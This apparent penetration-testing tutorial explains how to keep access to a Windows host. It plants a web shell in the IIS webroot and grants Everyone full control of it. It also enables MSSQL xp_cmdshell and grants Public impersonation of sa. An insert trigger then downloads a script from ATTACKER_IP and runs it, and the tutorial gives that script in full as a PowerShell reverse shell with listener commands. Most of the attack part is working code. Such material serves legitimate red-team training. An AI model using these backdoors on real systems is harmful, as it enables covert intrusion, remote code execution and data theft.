Persisting through existing services

Any application where you have some degree of control on what gets executed can be backdoored in a similar way. The possibilities are endless!

Using web shells

Download a web shell like ASP.NET web shell. Transfer it to the target machine and move it into the webroot, which for IIS by default is the C:\inetpub\wwwroot directory.

move shell.aspx C:\inetpub\wwwroot\

We can then run commands from the web server by going to the following URL:

http://<IP target>/shell.aspx

Note: If you are getting a Permission Denied error while accessing the shell’s URL, just grant everyone full permissions on the file to get it working. You can do so with

icacls shell.aspx /grant Everyone:F

Web shells provide a simple way to leave a backdoor on a system, it is usual for blue teams to check file integrity in the web directories. Any change to a file in there will probably trigger an alert.

Using MSSQL as a backdoor

There are many ways to plant backdoors in MSSQL Server installations, one of which is abusing triggers. Triggers in MSSQL allow for bind actions to be performed when specific events occur in the database. Those events can range from a user logging in up to data being inserted, updated or deleted from a given table.

xp_cmdshell is a stored procedure provided by default in any MSSQL installation. It allows for running commands directly in the system’s console but comes disabled by default. To enable it, open Microsoft SQL Server Management Studio 18, from the start menu. When asked for authentication, use Windows Authentication (the default value), and you will be logged on with the credentials of the current Windows User. By default, the local Administrator account will have access to all DBs.

Once logged in, click on the New Query button to open the query editor:

Run the following SQL sentences to enable the Advanced Options in the MSSQL configuration, and enable xp_cmdshell.

sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

Next up is making sure that any website accessing the database can run xp_cmdshell. By default, only database users with the sysadmin role will be able to do so. Since it is expected that web applications use a restricted database user, we can grant privileges to all users to impersonate the sa user, which is the default database administrator:

USE master

GRANT IMPERSONATE ON LOGIN::sa to [Public];

Configuring a trigger starts by changing to the HRDB database:

USE HRDB

The trigger will leverage xp_cmdshell to execute Powershell to download and run a .ps1 file from a web server controlled by the attacker. The trigger will be configured to execute whenever an INSERT is made into the Employees table of the HRDB database:

CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';

Now that the backdoor is set up, let’s create evilscript.ps1 in our attacker’s machine, which will contain a Powershell reverse shell:

$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4454);

$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};

$client.Close()

We will need to open two terminals to handle the connections involved in this exploit:

The trigger will perform the first connection to download and execute evilscript.ps1. Our trigger is using port 8000 for that.

python -m http.server

The second connection will be a reverse shell on port 4454 back to our attacker machine.

nc -lvp 4454

Navigate to http://IP target/ and insert an employee into the web application.